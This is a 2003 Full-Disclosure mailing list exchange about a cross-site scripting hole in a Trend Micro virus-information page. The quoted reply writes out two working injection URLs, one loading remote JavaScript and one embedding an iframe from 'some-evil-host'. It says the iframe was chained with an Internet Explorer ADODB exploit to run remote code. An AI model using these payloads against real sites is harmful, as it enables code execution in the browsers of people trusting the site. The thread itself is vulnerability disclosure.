hi Donnie, thanks for your very fast privat & list reply - you're my man for xss ;)
regards -mo- m> well... lets see, we could make it an untrusted link by m> " m> http://de.trendmicro-europe.com/enterprise/security_info/ve_detail.php?id=55756&; m> VName=WORM_MSBLAST.<script%20language="JavaScript"%20src="http://www.astalavista m> .com/backend/news.js"%20type="text/javascript"></script> " m> and include some remote javascript of our choice, or the latest IE ADODB explot. m> the obvious choice for that would be the classic.. m> http://de.trendmicro-europe.com/enterprise/security_info/ve_detail.php?id=55756&; m> VName=WORM_MSBLAST.<iframe m> src="http://some-evil-host/script/orhtml/etc/bla/";></iframe> m> for everones info, the above was tested with the ADODB exploit to execute m> remote code... sucessfully i might add. ( unpatched IE ) m> this goes to show that XSS is still very much a security concern, especially m> coupled together with the lastest browser exploit to become a very dangerous m> vector of attack, especially by way of a previously "trusted" URL. m> this is not looking real good for trend. m> good job Mo 8-) m> morning_wood m> http://exploitlabs.com m> http://e2-labs.com m> ----- Original Message ----- m> From: "Redaktion-Kryptocrew" <[EMAIL PROTECTED]> m> To: <[EMAIL PROTECTED]> m> Sent: Friday, August 29, 2003 12:02 AM m> Subject: [Full-Disclosure] Selfmade worms in the wild ;) >> You can change id's and names... >> -mo- >> Kryptocrew >> .: your security advisor team :. mailto:[EMAIL PROTECTED] >> _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
